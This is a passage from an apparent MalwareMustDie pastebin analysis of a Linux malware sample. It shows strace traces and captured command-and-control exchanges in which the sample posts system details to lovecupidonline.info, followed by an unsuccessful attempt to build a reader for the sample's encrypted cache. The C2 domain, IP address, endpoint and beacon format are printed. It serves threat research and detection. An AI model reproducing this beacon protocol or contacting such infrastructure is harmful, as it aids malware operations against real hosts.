  611. [pid 18153] read(4, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 475
  612. [pid 18153] read(4, "", 4096)           = 0
  613. [pid 18153] close(4)                    = 0
  614. [pid 18153] munmap(0x7f57db0be000, 4096) = 0
  615. [pid 18153] open("/etc/ld.so.cache", O_RDONLY) = 4
  616. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
  617. [pid 18153] mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 4, 0) = 0x7f57db0b1000
  618. [pid 18153] close(4)                    = 0
  619. [pid 18153] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
  620. [pid 18153] open("/lib/x86_64-linux-gnu/libnss_files.so.2", O_RDONLY) = 4
  621. [pid 18153] read(4, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\200!\0\0\0\0\0\0"..., 832) = 832
  622. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=47616, ...}) = 0
  623. [pid 18153] mmap(NULL, 2143624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 4, 0) = 0x7f57d4acd000
  624. [pid 18153] mprotect(0x7f57d4ad8000, 2093056, PROT_NONE) = 0
  625. [pid 18153] mmap(0x7f57d4cd7000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0xa000) = 0x7f57d4cd7000
  626. [pid 18153] close(4)                    = 0
  627. [pid 18153] mprotect(0x7f57d4cd7000, 4096, PROT_READ) = 0
  628. [pid 18153] munmap(0x7f57db0b1000, 56122) = 0
  629. [pid 18153] open("/etc/host.conf", O_RDONLY) = 4
  630. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=9, ...}) = 0
  631. [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
  632. [pid 18153] read(4, "multi on\n", 4096) = 9
  633. [pid 18153] read(4, "", 4096)           = 0
  634. [pid 18153] close(4)                    = 0
  635. [pid 18153] munmap(0x7f57db0be000, 4096) = 0
  636. [pid 18153] futex(0x7f57d90a0324, FUTEX_WAKE_PRIVATE, 2147483647) = 0
  637. [pid 18153] open("/etc/hosts", O_RDONLY|O_CLOEXEC) = 4
  638. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=495, ...}) = 0
  639. [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
  640. [pid 18153] read(4, "### Hetzner Online AG installima"..., 4096) = 495
  641. [pid 18153] read(4, "", 4096)           = 0
  642. [pid 18153] close(4)                    = 0
  643. [pid 18153] munmap(0x7f57db0be000, 4096) = 0
  644. [pid 18153] open("/etc/ld.so.cache", O_RDONLY) = 4
  645. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
  646. [pid 18153] mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 4, 0) = 0x7f57db0b1000
  647. [pid 18153] close(4)                    = 0
  648. [pid 18153] access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
  649. [pid 18153] open("/lib/x86_64-linux-gnu/libnss_dns.so.2", O_RDONLY) = 4
  650. [pid 18153] read(4, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\20\0\0\0\0\0\0"..., 832) = 832
  651. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=22928, ...}) = 0
  652. [pid 18153] mmap(NULL, 2117888, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 4, 0) = 0x7f57d48c7000
  653. [pid 18153] mprotect(0x7f57d48cc000, 2093056, PROT_NONE) = 0
  654. [pid 18153] mmap(0x7f57d4acb000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 4, 0x4000) = 0x7f57d4acb000
  655. [pid 18153] close(4)                    = 0
  656. [pid 18153] mprotect(0x7f57d4acb000, 4096, PROT_READ) = 0
  657. [pid 18153] munmap(0x7f57db0b1000, 56122) = 0
  658. [pid 18153] stat("/etc/resolv.conf", {st_mode=S_IFREG|0644, st_size=629, ...}) = 0
  659. [pid 18153] open("/etc/resolv.conf", O_RDONLY) = 4
  660. [pid 18153] fstat(4, {st_mode=S_IFREG|0644, st_size=629, ...}) = 0
  661. [pid 18153] mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f57db0be000
  662. [pid 18153] read(4, "### Hetzner Online AG installima"..., 4096) = 629
  663. [pid 18153] read(4, "", 4096)           = 0
  664. [pid 18153] close(4)                    = 0
  665. [pid 18153] munmap(0x7f57db0be000, 4096) = 0
  666. [pid 18153] uname({sys="Linux", node="1x111", ...}) = 0
  667. [pid 18153] socket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP) = 4
  668. [pid 18153] connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
  669. [pid 18153] poll([{fd=4, events=POLLOUT}], 1, 0) = 1 ([{fd=4, revents=POLLOUT}])
  670. [pid 18153] sendto(4, "\313:\1\0\0\1\0\0\0\0\0\0\17lovecupidonline\4inf"..., 38, MSG_NOSIGNAL, NULL, 0) = 38
  671. [pid 18153] poll([{fd=4, events=POLLIN}], 1, 5000) = 1 ([{fd=4, revents=POLLIN}])
  672. [pid 18153] ioctl(4, FIONREAD, [54])    = 0
  673. [pid 18153] recvfrom(4, "\313:\201\200\0\1\0\1\0\0\0\0\17lovecupidonline\4inf"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 54
  674. [pid 18153] close(4)                    = 0
  675. [pid 18153] socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
  676. [pid 18153] connect(4, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("176.119.3.242")}, 16) = 0
  677. [pid 18153] write(4, "POST /cupids_banner/cupids.php H"..., 196) = 196
  678.  
  679.  
  680. // CALLBACKS GENERATED:
  681.  
  682. // CNC calls -1-
  683.  
  684. POST /cupids_banner/cupids.php HTTP/1.0
  685. Host: lovecupidonline.info
  686. Pragma: 1337
  687. Content-Length: 91
  688.  
  689. R,20130826,64,0,,Linux 1x111 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u1 x86_64 GNU/Linux,
  690.  
  691. // response:
  692. HTTP/1.1 200 OK
  693. Date: Tue, 05 Aug 2014 08:30:05 GMT
  694. Server: Apache/2.2.15 (CentOS)
  695. X-Powered-By: PHP/5.5.15
  696. Content-Length: 13
  697. Connection: close
  698. Content-Type: text/html; charset=UTF-8
  699.  
  700. mysql_connect^Y<96><E0>S<E5><EC>^@^@B^@^@^@B^@^@^@^@^Y<DB><F2><BE>)^@&<88>v%<8C>^H^@E<CC>^@4m^Q@^@9^F<AC>
  701. <B0>w^C<F2>N.%E^@P<8A><B8><86>9<DE>^Y<D0>P<EA><BE><80>^Q^@zF<81>^@^@^A^A^H[...]
  702.  
  703.  
  704. // CNC Calls -2-
  705.  
  706. POST /cupids_banner/cupids.php HTTP/1.0
  707. Host: lovecupidonline.info
  708. Pragma: 1337
  709. Content-Length: 91
  710.  
  711. R,20130826,64,0,,Linux 1x111 3.2.0-4-amd64 #1 SMP Debian 3.2.60-1+deb7u1 x86_64 GNU/Linux,
  712.  
  713. //response
  714.  
  715. HTTP/1.1 200 OK
  716. Date: Tue, 05 Aug 2014 08:31:05 GMT
  717. Server: Apache/2.2.15 (CentOS)
  718. X-Powered-By: PHP/5.5.15
  719. Content-Length: 6
  720. Connection: close
  721. Content-Type: text/html; charset=UTF-8
  722.  
  723. R,200
  724.  
  725.  
  726. // CNC Calls -3-
  727.  
  728. POST /cupids_banner/cupids.php HTTP/1.0
  729. Host: lovecupidonline.info
  730. Pragma: 1337
  731. Content-Length: 12
  732.  
  733. P,0,0,0,0,2
  734.  
  735.  
  736. // response:
  737.  
  738. HTTP/1.1 200 OK
  739. Date: Tue, 05 Aug 2014 08:32:06 GMT
  740. Server: Apache/2.2.15 (CentOS)
  741. X-Powered-By: PHP/5.5.15
  742. Content-Length: 2
  743. Connection: close
  744. Content-Type: text/html; charset=UTF-8
  745.  
  746. C
  747.  
  748. // CNC calls -4-
  749.  
  750. POST /cupids_banner/cupids.php HTTP/1.0
  751. Host: lovecupidonline.info
  752. Pragma: 1337
  753. Content-Length: 12
  754.  
  755. P,0,0,0,0,3
  756.  
  757. // response:
  758.  
  759. HTTP/1.1 200 OK
  760. Date: Tue, 05 Aug 2014 08:24:55 GMT
  761. Server: Apache/2.2.15 (CentOS)
  762. X-Powered-By: PHP/5.5.15
  763. Content-Length: 6
  764. Connection: close
  765. Content-Type: text/html; charset=UTF-8
  766.  
  767. R,200
  768.  
  769. // compile the reader for cache reading..
  770. // source1: https://github.com/freeoks/SD0_reader
  771. // source2: http://ultra-embedded.com/fat_filelib
  772.  
  773. // put all in a place:
  774. -rw-r--r-- 1 rik rik 4980 Nov 30  2013 fat_access.h
  775. -rw-r--r-- 1 rik rik  526 Nov 30  2013 fat_cache.h
  776. -rw-r--r-- 1 rik rik 4983 Nov 30  2013 fat_defs.h
  777. -rw-r--r-- 1 rik rik 4698 Nov 30  2013 fat_filelib.h
  778. -rw-r--r-- 1 rik rik  545 Nov 30  2013 fat_format.h
  779. -rw-r--r-- 1 rik rik 4646 Nov 30  2013 fat_list.h
  780. -rw-r--r-- 1 rik rik 3330 Nov 30  2013 fat_misc.h
  781. -rw-r--r-- 1 rik rik 2409 Nov 30  2013 fat_opts.h
  782. -rw-r--r-- 1 rik rik  783 Nov 30  2013 fat_string.h
  783. -rw-r--r-- 1 rik rik  922 Nov 30  2013 fat_table.h
  784. -rw-r--r-- 1 rik rik 1998 Nov 30  2013 fat_types.h
  785. -rw-r--r-- 1 rik rik  599 Nov 30  2013 fat_write.h
  786.  
  787. // edit the makefile..get rid of "/lib/"
  788. // and compile..
  789.  
  790.  $ make
  791. gcc -c -I./lib read_sd0.c -o read_sd0.o
  792. read_sd0.c: In function 'decrypt_blocks':
  793. read_sd0.c:51:9: warning: incompatible implicit declaration of built-in function 'memcpy' [enabled by default]
  794. read_sd0.c: In function 'read_files_from_directory':
  795. read_sd0.c:130:47: warning: incompatible implicit declaration of built-in function 'strlen' [enabled by default]
  796. read_sd0.c:131:17: warning: incompatible implicit declaration of built-in function 'strcpy' [enabled by default]
  797. read_sd0.c:132:17: warning: incompatible implicit declaration of built-in function 'strcat' [enabled by default]
  798. gcc -c -I./lib fat_access.c -o fat_access.o
  799. gcc -c -I./lib fat_cache.c -o fat_cache.o
  800. gcc -c -I./lib fat_filelib.c -o fat_filelib.o
  801. gcc -c -I./lib fat_format.c -o fat_format.o
  802. gcc -c -I./lib fat_misc.c -o fat_misc.o
  803. gcc -c -I./lib fat_string.c -o fat_string.o
  804. gcc -c -I./lib fat_table.c -o fat_table.o
  805. gcc -c -I./lib fat_write.c -o fat_write.o
  806. gcc -s read_sd0.o fat_access.o fat_cache.o fat_filelib.o fat_format.o fat_misc.o fat_string.o fat_table.o fat_write.o -o read_sd0
  807.  
  808. // doesnt work :-(((( no output at all..
  809.  
  810. ./read_sd0  -f .cache -d ./test
  811. execve("./read_sd0", ["./read_sd0", "-f", ".cache", "-d", "./test"], [/* 20 vars */]) = 0
  812. brk(0)                                  = 0x1479000
  813. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  814. mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf716000
  815. access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
  816. open("/etc/ld.so.cache", O_RDONLY)      = 3
  817. fstat(3, {st_mode=S_IFREG|0644, st_size=56122, ...}) = 0
  818. mmap(NULL, 56122, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fdfcf708000
  819. close(3)                                = 0
  820. access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
  821. open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 3
  822. read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
  823. fstat(3, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
  824. mmap(NULL, 3713144, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fdfcf16e000
  825. mprotect(0x7fdfcf2f0000, 2093056, PROT_NONE) = 0
  826. mmap(0x7fdfcf4ef000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x181000) = 0x7fdfcf4ef000
  827. mmap(0x7fdfcf4f4000, 18552, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf4f4000
  828. close(3)                                = 0
  829. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf707000
  830. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf706000
  831. mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fdfcf705000
  832. arch_prctl(ARCH_SET_FS, 0x7fdfcf706700) = 0
  833. mprotect(0x7fdfcf4ef000, 16384, PROT_READ) = 0
  834. mprotect(0x7fdfcf718000, 4096, PROT_READ) = 0
  835. munmap(0x7fdfcf708000, 56122)           = 0
  836. open(".cache", O_RDONLY)                = 3
  837. lseek(3, 0, SEEK_END)                   = 12582912
  838. mmap(NULL, 12582912, PROT_READ, MAP_SHARED, 3, 0) = 0x7fdfce56e000
  839. exit_group(0)                           = ?
  840.  
  841.  
  842. ----
  843. #MalwareMustdie | @unixfreaxjp
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top